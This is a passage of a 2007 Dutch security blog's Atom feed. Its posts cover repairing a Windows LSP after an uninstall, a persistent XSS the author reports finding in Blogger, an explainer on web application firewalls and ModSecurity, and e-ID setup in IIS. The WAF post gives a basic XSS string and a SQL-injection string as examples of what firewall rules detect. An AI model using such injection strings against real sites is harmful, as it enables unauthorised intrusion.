href='http://www.blogger.com/feeds/901166975878910572/posts/default/7395767679071226608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7395767679071226608'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/05/digitale-radio-en-bandbreedte.html' title='Digitale radio en bandbreedte'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-7229522535233117870</id><published>2007-05-11T06:39:00.000-07:00</published><updated>2007-05-11T06:46:49.555-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VPN'/><category scheme='http://www.blogger.com/atom/ns#' term='netwerk problemen'/><category scheme='http://www.blogger.com/atom/ns#' term='LSP fix'/><category scheme='http://www.blogger.com/atom/ns#' term='LinkScanner'/><title type='text'>Problemen met netwerk adaptors op XP</title><content type='html'>Begin deze week een heel rare situatie meegemaakt. Ik had een programma, LinkScanner geïnstalleerd dat URLs screent op exploits. Blijkbaar had dit programma de volledige windows netwerk socket aangepast. Omdat ik in de firewall logs rare HTTP traffiek zag naar een ADSL adres in Israel (!), besloot ik om het programma te verwijderen om te kijken of de traffiek stopte. Aangezien ik altijd met 5 zaken tegelijk bezig ben, had ik tijdens de uninstall ook een VPN connectie opgestart met Check Point SecureClient. Plots stopte de SecureClient met een bizarre foutmelding: SecureClient failed to start. Please re-install.&lt;br /&gt;Een reboot loste het probleem niet op. Ik kreeg een pop-up dat een service van SecureClient niet kon opstarten.&lt;br /&gt;Dan maar de laatste nieuwe versie installeren.&lt;br /&gt;Reboot.&lt;br /&gt;Zelfde errors.&lt;br /&gt;Geen VPN.&lt;br /&gt;Paniek.&lt;br /&gt;En dan kreeg ik een inval. Ik had vroeger al eens een gelijkaardig probleem geconstateerd bij een PC van een klant. De LSPs (iets te maken met registry keys en netwerk adaptors/sockets) waren corrupt. Ik heb dan een gratis tool gedownload, LSP-Fix en dit laten draaien. Hij vond direct een paar zaken die te maken hadden met de uninstall van LinkScanner. De registry keys verwezen nog naar de DLL die ondertussen is verwijderd door de uninstall. Gelukkig kan LSP-Fix dit verhelpen. En inderdaad, een reboot en de VPN client werkt zoals het moet. LSP-Fix kan je hier vinden: &lt;a href="http://www.cexx.org/lspfix.htm"&gt;http://www.cexx.org/lspfix.htm&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-7229522535233117870?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/7229522535233117870/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=7229522535233117870' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7229522535233117870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7229522535233117870'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/05/problemen-met-netwerk-adaptors-op-xp.html' title='Problemen met netwerk adaptors op XP'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-8723041651620607291</id><published>2007-04-23T01:56:00.000-07:00</published><updated>2007-04-23T01:59:28.437-07:00</updated><title type='text'>Cross-site-scripting in Blogger?</title><content type='html'>De lezers zullen zich nu wel afvragen waarom ze een Javascript pop-up zien met daarin de boodschap XSS. Blijkbaar is de cross-site-scripting attack die ik aanhaalde als voorbeeld in de blog over web application firewalls uitvoerbaar. U leest het goed. Als blogger kan ik dus Javascript uitvoeren die vanuit een 'trusted' omgeving wordt uitgevoerd. In vaktermen noemen we dit een persistent XSS want die wordt opgeslaan in de blog zelf.&lt;br /&gt;Ik heb direct contact genomen met Google, maar blijkbaar moet ik heel veel moeite doen om ze te overtuigen dat dit effectief een security issue is. Ongelooflijk!&lt;br /&gt;Dus er komt zeker een vervolg...&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-8723041651620607291?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/8723041651620607291/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=8723041651620607291' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/8723041651620607291'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/8723041651620607291'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/04/cross-site-scripting-in-blogger.html' title='Cross-site-scripting in Blogger?'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-4422289042910181124</id><published>2007-04-17T12:24:00.000-07:00</published><updated>2007-04-17T12:44:15.680-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web application firewall'/><category scheme='http://www.blogger.com/atom/ns#' term='web security'/><category scheme='http://www.blogger.com/atom/ns#' term='modsecurity'/><title type='text'>Waarom een web application firewall?</title><content type='html'>Ik was eerst van plan om een artikel te schrijven over de beveiliging van open-source content management systems maar ik zal eerst een kader scheppen :-)&lt;br /&gt;Vandaar dit bericht!&lt;br /&gt;Voor de mensen die dit lezen en die zeggen: web application firewall?! Een mooi Nederlands woord bestaat er niet buiten webstek vuurmuur...&lt;br /&gt;&lt;br /&gt;Een web application firewall laat toe om inkomend en uitgaand HTTP verkeer te controleren op inhoud. Waarom? Om aanvallen te detecteren en af te blokken. Aanvallen? Inderdaad: alle web sites worden dagelijks aangevallen door virussen, automatische scanners en hackers. Die zoeken kwetsbaarheden in de applicatie om te misbruiken en verder toegang te krijgen tot de achterliggende databank, informatie of netwerk. Meer informatie op &lt;a href="http://www.owasp.org"&gt;www.owasp.org&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Ik heb al honderden programmeurs verbaasd doen kijken met volgende vraag: "Kan je in jouw logfiles zien dat jouw applicatie wordt aangevallen, nu en hoe?" Ik heb nog nooit, ik herhaal nooit, een positief antwoord gekregen. Applicaties zijn niet gemaakt om aanvallen te detecteren, af te blokken en een alarm te geven. Waarom? Dit is geen functionele requirement, dus niet geïmplementeerd. Maar dit moet wel zo zijn!&lt;br /&gt;&lt;br /&gt;Vandaar dat een web application firewall (waf) nodig is. En er is zelfs een open-source versie: ModSecurity (&lt;a href="http://www.modsecurity.org"&gt;www.modsecurity.org&lt;/a&gt;). ModSecurity is een plugin voor Apache die inkomend en uitgaand HTTP verkeer controleert met regels. Die regels definiëren wat er niet mag aanwezig zijn in parameters bijvoorbeeld &lt;script&gt;alert('XSS')&lt;/script&gt; of 1 0R 1=1&lt;br /&gt;&lt;br /&gt;Het mooie aan een waf is dat dit geen verandering aan de applicatie vereist. Je plaats dit op een netwerkniveau voor de bestaande web applicaties en met behulp van mod_proxy kan je al die sites publishen.&lt;br /&gt;&lt;br /&gt;ModSecurity is compileerbaar op heel veel platformen. Ik heb dit overlaatst gecompileerd op een SuSe voor PowerPC bovenop IBM iSeries en dit werkt perfect! Zelfs heel performant!&lt;br /&gt;&lt;br /&gt;En dit zou niet open-source zijn als er geen "Core Rules" bestaan die veel aanvallen detecteren, maar niet afblokken. Er is zelf een Console, niet open-source wel gratis voor 3 sensors die je op de kan gebruiken om op de hoogte te blijven van transacties en aanvallen.&lt;br /&gt;&lt;br /&gt;Als jullie bijkomende vragen hebben, laat maar een comment na en ik zal trachten een antwoord te geven. Indien nodig, contacteer ik wel de maker van ModSecurity, Ivan Ristic.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-4422289042910181124?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/4422289042910181124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=4422289042910181124' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4422289042910181124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4422289042910181124'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/04/waarom-een-web-application-firewall.html' title='Waarom een web application firewall?'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-2707380946628036312</id><published>2007-03-27T02:02:00.000-07:00</published><updated>2007-03-27T02:11:23.598-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='e-id'/><title type='text'>Hoe de elektronische identiteitskaart gebruiken in IIS 6.0</title><content type='html'>Na een paar dagen zoeken en niets vinden, uiteindelijk toch de oplossing gevonden!&lt;br /&gt;De beste en enige manier om HTTPS te configureren voor de elektronische identiteitskaart in een paar eenvoudige stappen:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Installeer een server certificaat in IIS&lt;/li&gt;&lt;li&gt;Download het belgiumrca.cer certificaat van &lt;a href="http://certs.eid.belgium.be"&gt;http://certs.eid.belgium.be&lt;/a&gt; en importeer dit in de Local Machine - Trusted Root Certificate Authorities&lt;/li&gt;&lt;li&gt;Maak een Certificate Trust List in IIS met het Belgium Root CA certificaat&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Meer is het niet. &lt;/p&gt;&lt;p&gt;Wat je zeker niet mag doen: het Citizen CA certificaat importeren! Blijkbaar zijn deze niet uniek. Als je een e-ID hebt uitgereikt door een andere Citizen CA dan kan je niet inloggen. &lt;/p&gt;&lt;p&gt;De error die je dan krijgt is "The certificiate is ill-formed or is not trusted by the web server".&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-2707380946628036312?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/2707380946628036312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=2707380946628036312' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/2707380946628036312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/2707380946628036312'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/03/hoe-de-elektronische-identiteitskaart.html' title='Hoe de elektronische identiteitskaart gebruiken in IIS 6.0'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-9188331703465656137</id><published>2007-03-27T01:28:00.000-07:00</published><updated>2007-03-27T01:31:24.076-07:00</updated><title type='text'>Een Nederlandstalige blog over security</title><content type='html'>Ik heb besloten om een blog op te starten in het Nederlands waarbij ik mijn visie, ervaring en verdere opmerkingen kan bundelen die over security gaan. Waarom in het Nederlands? Wel, ik vind dat er te weinig informatie op Internet staat die zich specifiek richt op Nederlandstalige collega's in de IT wereld.&lt;br /&gt;&lt;br /&gt;Ik hoop dus dat ik hiermee bepaalde vragen of problemen kan helpen oplossen en ondertussen jullie op de hoogte kan houden ivm de laatste nieuwe trends, ontwikkelingen en aanvallen.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-9188331703465656137?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/9188331703465656137/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=9188331703465656137' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/9188331703465656137'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/9188331703465656137'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/03/een-nederlandstalige-blog-over-security.html' title='Een Nederlandstalige blog over security'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry></feed>
